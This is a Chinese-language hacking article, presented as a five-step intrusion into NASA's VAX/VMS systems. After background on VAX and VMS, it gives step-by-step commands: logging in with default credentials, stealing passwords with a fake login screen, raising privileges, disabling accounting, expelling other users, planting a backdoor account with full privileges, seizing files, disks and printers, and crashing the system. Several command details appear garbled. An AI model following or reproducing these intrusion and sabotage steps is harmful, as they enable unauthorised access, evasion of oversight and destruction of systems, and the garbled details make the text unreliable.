黑客五大步入侵美國太空總署
警告:本章涉及某些軍事機密,所以在某些地方作了模糊處理。本文危險度極高,請勿模仿。刊登本文的目的是為了讓大家對VAX計算機和VMS操作系統有所了解。
在一些黑客入侵活動中,很多黑客根本就不屑于入侵那些的小得可憐的漏洞網站,因為這對那些喜歡刺激的黑客來說,根本就不算什么。用他們的話來說,入侵那些網站只是他們在大腦疲勞時作的一種休閑游戲而已。而對于這些危險級的黑客來說,他們真正感興趣的是那些平時難得一見放在重要機構和實驗室里的計算機,只有那些東西能夠真正的刺激起他們的大腦神經系統的活躍,也是真正能夠讓他們提起胃口的東西。
在這些眾多的提味劑中被美國太空總署、美國中央情報局等重要機構青睞的VAX計算機和它的VMS操作系統成為了超級黑客們的最愛,這些東西都能夠刺激他們不斷的研究試圖入侵這些重要機構的每一次微小的機會。
什么是VAX計算機?VMS操作系統是什么?
欲讀懂后面的黑客手記,請先了解下面所講的基礎知識。
那么什么是VAX計算機?VMS操作系統又是什么?以下我們就簡單地介紹一下這些擺放在實驗室里的大型機核心系統。
在1978年,DEC公司建立了第一個基于VAX( virtual address extension)即虛擬地址擴展的計算機體系,它是DEC計算機系統特有的復雜指令計算(CISC)體系結構的計算機VAX11、780。這臺大家伙在當時是基本32位的計算機,并且能夠有高達1MIPS的運算性能。在那個年代,這臺計算機的速度和性能都是無與倫比的。在當時要值$200,000。但顯然他是最棒的。
更加值得一提的是VAX是多用戶系統,它所采用的網絡應用包括:
通信終端協議(CTERM):DNA為VMS系統提供的虛擬終端服務使用該協議,可以用于任何連接,是LAT的可選協議。
分布式命名服務(DNS):DNS為VMS系統的通用命名服務,允許對用戶、文件和節點等進行命名,使其成為整個網絡共知的標識。
數據存取協議(DAP):DAP是為VMS系統提供遠程文件存取的老的協議集。DAP將被DFS所代替。
分布式文件系統(DFS):和網絡文件系統相似,目錄可以標識為共享,并且能夠裝到遠程節點上。
分布式隊列服務(DQS):主要用來進行打印處理,該服務使VMS能夠在網上作業隊列。“作業控制”將作業從隊列中移出,并將其傳至協同程序,由它來處理作業。
VAX計算機專用的終端只能用于VAX系統上,并且可能用于Internet服務,它的唯一性和不兼容性保持著它的安全基礎。但是對一個非常了解VAX系統的黑客來說這些并不算是什么,他們一樣可以利用PC機上的軟件來同VAX系統取得連接,并會想方設法摧毀他們,但是每一個黑客的必須要有一個VT100的終端仿真程序,當然這并不難搞到。
那么什么是VMS哪?VMS(Virtual Memory System)即虛擬內存系統,是比較特別的一種計算機網絡操作系統,但是VMS和其他的系統還是有那么一些相似之處的,比如它的登錄介面就比較象UNIX系統的。你首先看到的是一個登錄信息Username:;接下來便是用戶密碼: password:如果你能夠正確的輸入信息的話,那么你就會進到一個以$為提示符的字符操作環境下。當你登錄成功后,還會有一系列的提示信息,包括你的username,你的process ID,等等。如下表:(此表欠奉:)
對于一個熟悉操作系統的黑客來說,他會很快地感覺到VMS這個系統和其他的系統如UNIX等操作系統基本一樣,一個優秀的黑客在短期內都會將它使用得很得心應手,對于他們來說這些系統的唯一區別只是命令提示不太一樣而已。舉個例子,如果UNIX系統中的C shell要調用設備的話,就要在命令行輸入SHELL設備的調用命令。而VMS中假設調用的這個設備就是history(Dos有相應的模塊,叫做Dos提示符),VMS系統中,如果你一直按住Ctrl鍵,并且輸入字符B,那么就會停止其他形式的命令進程,列出所有目前的進程,返回進程,并且報告目前的用戶統計,以便進行修改。想要入侵VMS這些都是必備的基礎知識。
當然在Internet上還存在許多的VAM系統的服務器,而且至今來說這個古老的VMS系統還是很有活力的,當然他仍然在不但地進行血液的更新,VMS最新的操作系統叫做Open/VMS網絡操作系統。OpenVMS主要可以運行在VAX和Alpha系統的主機上,Alpha是一個非常快的工作站系統,而且它可以運行Windows NT,OpenVMS,Digital UNIX等多種系統。這是黑客們夢寐以求的東西,在早些時候許多的黑客為了追求到Alpha工作站,寧肯放棄高薪而去一些麻木而沒有活力的科研機構。
目前公共在線的VAX主機大都已經時間比較長了,比如美國多所大學的圖書館的系統,那些都已經非常非常old的VAX系統了。但是在那里我們可以了解到一些VAX/VMS和詳細的情況,這些對于一個對VAX一無所知的人來說是一個很好的機會。
VMS系統的安全情況
想要入侵這些重要的機構,黑客們必須了解VMS網絡系統的安全性。在VMS系統中安全是經過精心考慮的,因為這些大家伙都是使用在一些重要的研究和軍事機構里的,安全問題成為了VMS的重要性能。比如,VMS基本上都有一個強有力的有讀寫控制,(當然這些都還要看系統管理員的設置情況而定)。在VMS系統中的讀寫控制和Novel Netware 平臺下的類似,下面就是它所提供的簡單的控制命令:
Time(時間):你可以控制哪一天,哪個用戶,可以在哪個小時來訪問這個系統,默認為一個星期7天,一天24小時,就象是防火墻一樣,你可以精確的控制每一個用戶。
Resources(資源):你可以控制每一個登錄用戶的訪問權限,可以對每一個目錄設置權限。
當然這些都只是VMS系統對于訪問控制的一個簡單的舉例而己。實際上,在VMS系統中還有多重的特權限制,并且可以用于工作組。換句話說,在VMS系統中,讀寫控制是一個非常繁雜的設置,有好多好多的選項。正是由于這個原因,因此很少有黑客能夠突破這個系統。有時,這種繁雜的設置反而會成為它自身帶給網管們的一項非常繁重的工件。這個星球上的聰明的黑客已經意識到了這一點了:
VMS系統的最大的優點就是它的巨大的靈活性。系統管理員可以選擇實現或是忽略這種復雜的設置,那么就會給黑客留下機會了。
攻擊一個VAX(或是以VMS作為操作系統)的網絡操作系統來說,同攻擊UNIX系統有很大的不同,首先VMS這個系統的password文件的存放和它的結構和UNIX有很大的不同,UNIX系統下是放在/etc/passwd 這個文件中,這個文件包括定義的用戶名,password,登錄信息,以及它所在的工作組。與此對比,VMS系統的這個文件不但包括以上這些簡單的信息,還有好多的其他的信息:
在每一個運行VMS的DEC主機都會將所有用戶的檔案資料放在一個文件當中,叫做SYSUAF(System User Authorization File)對于每一個使用此系統的用戶包括系統管理員,都有一個record來記錄下用戶的登錄時間和訪問權限,而且它還給出了password的詳細的時間,password的長度,以及用戶登錄時所有的詳細信息。這真讓黑客頭疼。
但是就是這種難以理解的password文件結構也有它自身的漏洞,那就是如果一個黑客成功的獲得了對這個文件操作的權力,并且修改了它,那么整個系統都將面臨危險,然而發生這種情況的可能性微乎其微。
一般情況下用戶通過一種叫做UIC(User Identification Code)(用戶識別碼)的程序才能登錄系統。這和UNIX系統中的GID是非常相近的。它識別出登錄用戶,還有該用戶的訪問權限,以及工作組,因此,你可以想象這種UIC系統是一個統一的數據庫。#p#
攻擊美國太空總署Vax-11/780,我想看看美國到底登上月球了嗎,有沒有外星人跟他們接觸,天哪,這一切都是那么的神氣,對我就像是一塊磁鐵,將我所有的激情和目光都拉上了這個地方。http://www.nasa.gov就是他的老巢,但是我對這個并不感興趣,因為他一樣采用的都是普通的WEB服務器。我的目標是突破它的內部網絡,也就是NASA的科研核心網絡。
入侵美國太空總署第一步:登錄
有兩種方法可以登錄VMS系統。第一種是正常登錄,另外一種就是利用試探密碼以及欺騙。我們是黑客,優秀的黑客!我們當然選擇欺騙(Cheating)登陸,如果你想要成功的混進VAX系統,你可以利用兩種方法:
1、用利用系統中現有的其他人的用戶名和密碼。
2、利用默認的密碼進行欺騙進入。
(1)利用其他人的密碼:
這種方法既有好的一面,也有不好的一面,好的一方面是你不必新建一個帳號,或是用一個受限制的帳號,那么在這種情況下系統管理員什么都不會覺察到,壞的一方面就是你所利用的帳號的主人可能會注意到。你想想,如果他并沒有登錄,但是又顯示它在線,他會有什么感覺,而且會留下登陸的種種記錄,并且他這個帳號還可能沒有我們所需要獲得的權限。獲得其他人的密碼比較簡單,只要你進入系統,即使只是很小的權限,那么你只要向系統管理員的機器發送一個程序,有點類似于現在的木馬或者是欺騙工具。它包含如同登錄時需要的屏幕一樣,那么,你就可能獲得他的密碼,還有用戶帳號,再把這個文件從遠程的打印機打印出來或是輸出到一個文件上,當然你一定記得要把這個文件刪除掉。
(2)利用系統的默認的密碼:
在VAX系統建立時,有4個默認的用戶帳號還有密碼,它有可能被自修改或是刪除,但是系統管理員通常有可能會遺留下一兩個以備將來系統遇到麻煩的時候進行恢復工作,這4個帳號和密碼分別是:
- Name Password
- SYSTEM MANAGER or OPERATOR
- FIELD SERVICE or TEST
- DEFAULT USER or DEFAULT
- SYSTEST UETP or SYSTEST
我的經驗告訴我,一般來說FIELD SERVICE這個帳號都會起作用。一旦我們登錄了該系統,如果你想要獲得最高的權限,你就應該輸入:
$SET PROC/PRIV=ALL
‘$’是系統提示,如果你要是本身獲得的權限不夠,就會系統提示你不能夠執行該命令,那么你就要換一個password,才能得到你想要的特權。是不是很令我們頭疼?不過一般的情況下方法還是奏效的。
入侵美國太空總署第二步:瀏覽該系統
成功的利用完第一步,我們已經可以順利的在VMS系統上登陸了,下一步要做什么呢?當然是要獲取更多的信息,但是首先,我們一定要確認是否能夠返回,那么我們就先要這樣做:
$SET ACCOUNTING/DISABLE
這將會禁止VMS系統中那個討厭的跟蹤程序對我們的跟蹤,再輸入:
$SHOW USERS
看一看誰在系統上,如果你看到我們自己的帳號是兩個的話,趕快退出來。我們不想因為做傻事而被捉吧,但是我們一旦確認無人能夠監視我們的行動,那么我們接下來就輸入:
$SET LOGINS/INTERACTIVE=0
這將禁止其他人登錄到這臺機器上,下一步就要把其他的人踢出去。
$SHOW USERS
系統可能返回如下的信息:
- VAX/VMS INTERACTIVE USERS
- 23-JUL-2000 09:37:15.54
- Total number of interactive users= 6
- Username Process Name PID Terminal
- BRUNO BRUNO 0000026B TTD3:
- FIELD FIELD 00000FF2 TTC2:
- JOHNSON _TTD5: 0000026D TTD5:
- LINCOLN LINCOLN 0000026A TTD2:
- CYBERPUNK CYBERPUNK 000001D8 TTD4:
- HARDCORE HARDCORE 00000263 TTC0:
現在,如果你以FIELD用戶名登錄的話,我們要通過驗證的話,輸入:
$STOP/ID=PID
這樣的話,就可以顯示除我們之外的用戶的情況,并且把的用戶踢出去,最好在晚上用戶少時這樣做,因為如果用戶管理員收到好多的控訴信息的話,他就可能會發現并捉住你。接下來,我們要確認,我們能夠再次登錄到這個系統上,為了能達到這一點:
$SET DEF SYS$SROOT:[SYSEXE]
這樣的話,你將進入到SYS$SROOT的SYSEXE目錄下一行:
$RUN AUTHORIZE
系統返回如下信息:
- UAF> - now type:
- UAF> ADD WASTOID /PASSWORD=
- ZEDNET /UIC=[099,900] /CPUTIME=0-
- /DEVICE=SYS$SYSROOT /DIRECTORY=
- [SYSEXE] /PRIVS=ALL /NOACCOUNTING
- UAF> EXIT
這是什么意思呢,讓我們往下做:
ADD WASTOID-加入一個記錄名字叫WASTOID
/PASSWORD=ZEDNET-為新帳號加密碼
/CPUTIME=0-將你的帳號的訪問時間變為不限時,
/UIC=[099,900]
/DEVICE=SYS$SYSROOT-設置你的工作驅動器
/DIRECTORY=[SYSEXE]-設置你的工作目錄
/PRIVS=ALL-獲得最高的操作權限
/NOACCOUNTING-禁止系統跟蹤
好了,你現在就有了所有的特權,并且有了合法的帳號,返回系統。
入侵美國太空總署第三步:系統的基礎
如果你從沒有用過VAX系統的話,可以看一下這些提示:
HELP-將會列出所有的命令,并且能夠給你詳細的解釋
SET DEF drive:[directory.sub1,sub2]-設置默認的工作驅動器還有工作目錄
TYPE或是T-和DOS下的TYPE一樣,是顯示文件內容的:如T file.txt
PRINT或是PR-打印文件,如:PR file.txt
DIR或是D-顯示工作目錄
DIR/PRINT 或D/PRINT在屏幕和打印機上同時顯示。
RUN或是R-執行.exe的可執行文件,如:r filename.exe
好了,準備的比較充分了
入侵美國太空總署第四步:開工了
1、修改文件:
這個世界上最美好的事情就是剝奪他本人的文件的控制權了,當你看到他對自己的文件束手無策時,我們可能會高興手舞足蹈。讓我們偷著樂吧。你可以用:set protection 這個命令,如果你想一個文件只能由你自己訪問,而其他的任何人都無權訪問時,你可以運行
$set prot=(s:rwed,o,g,w) test.dat
你就有了完全的特權,其他的人包括文件的擁有者,工作組,以及管理員都沒有權限。
2、磁盤:
你可以對整個磁盤都一次加以控制,比如你要控制驅動器:dirver1
- $dismount driver1
- $deallocate driver1
- $set prot(s,o;r,g,w)/device/owner_vic[099,900] driver1
- $allocate driver1
- $mount driver1
這樣你就有了一個個人控制的驅動器了。
3、打印機:
我們知道如果要打印一個文件只要輸入:
$pr hacking.dat
如果運行
$stop/abort lpao
那么,系統就會停止打印機目前的工作并將它踢出隊列。
$delete/queve lpao
這會將隊列中所有的項目全部清除,那么打印機就是你一個人的了。如此等等,我們只介紹幾種,其他的就看你自己的了。
入侵美國太空總署第五步,安全撤退
1、opccrash
如果要關閉系統的話:
$run sys$system:opccrash
系統會提示:
system shutdown complete –use console to halt system(請使用控制臺來關閉系統)
輸入:
- ^P
- >>>-type:
- >>>HALT
- HALTED AT 8000708A
2、破壞性退出
- ^P
- >>>HALT
- >>>@CRASH
這樣一整套入侵美國太空總署的行動,就讓我們躲在一邊偷偷看那些老外們忙活去吧,當然我們也不能忘記“正事”,這就是進入它的數據庫,看看那些他們的小秘密。
【編輯推薦】